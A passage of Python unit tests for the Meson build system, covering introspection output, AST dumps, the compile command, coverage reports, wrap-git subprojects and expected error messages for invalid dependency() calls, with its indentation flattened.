tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Plugins
long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
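        # "meson compile" accepts bare target names, "name:type" to select a
        # specific target type, and "path/name" to disambiguate identically named
        # targets in different directories; all three forms are exercised below.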
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
# Target specified in a project with non unique names
testdir = os.path.join(self.common_test_dir, '190 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but is inside build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown_dynamic/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(md_command_sections.keys())
help_output = self._run(self.meson_command + ['--help'])
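# Extract the {cmd1,cmd2,...} command list from the usage line of `meson --help`.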
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
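# Each command section must contain two fenced blocks holding the usage and
# arguments placeholders for dynamically generated help text.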
def get_data_pattern(command):
return re.compile(
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]'
r'^```[\r\n]'
r'.*?'
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]'
r'^```',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def _check_coverage_files(self, types=('text', 'xml', 'html')):
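# The coverage targets write their reports into meson-logs; check that each
# requested format was actually produced.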
covdir = Path(self.builddir) / 'meson-logs'
files = []
if 'text' in types:
files.append('coverage.txt')
if 'xml' in types:
files.append('coverage.xml')
if 'html' in types:
files.append('coveragereport/index.html')
for f in files:
self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f))
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '109 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
self._check_coverage_files(['html'])
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
self._check_coverage_files(['text'])
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
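# Constants defined in the first machine file are visible in later files,
# and the '/' operator joins path components.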
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '81 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
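# Turn the copied upstream sources into a git repository and point the
# .wrap file at it via a file:// URI.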
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
def test_multi_output_custom_target_no_warning(self):
testdir = os.path.join(self.common_test_dir, '235 custom_target source')
out = self.init(testdir)
self.assertNotRegex(out, 'WARNING:.*Using the first one.')
self.build()
self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
'Requires an ASM compiler for x86 or x86_64, which is currently only available on Linux CI runners')
def test_nostdlib(self):
testdir = os.path.join(self.unit_test_dir, '79 nostdlib')
machinefile = os.path.join(self.builddir, 'machine.txt')
with open(machinefile, 'w') as f:
f.write(textwrap.dedent('''
[properties]
c_stdlib = 'mylibc'
'''))
# Test native C stdlib
self.meson_native_file = machinefile
self.init(testdir)
self.build()
# Test cross C stdlib
self.new_builddir()
self.meson_native_file = None
self.meson_cross_file = machinefile
self.init(testdir)
self.build()
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
an error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
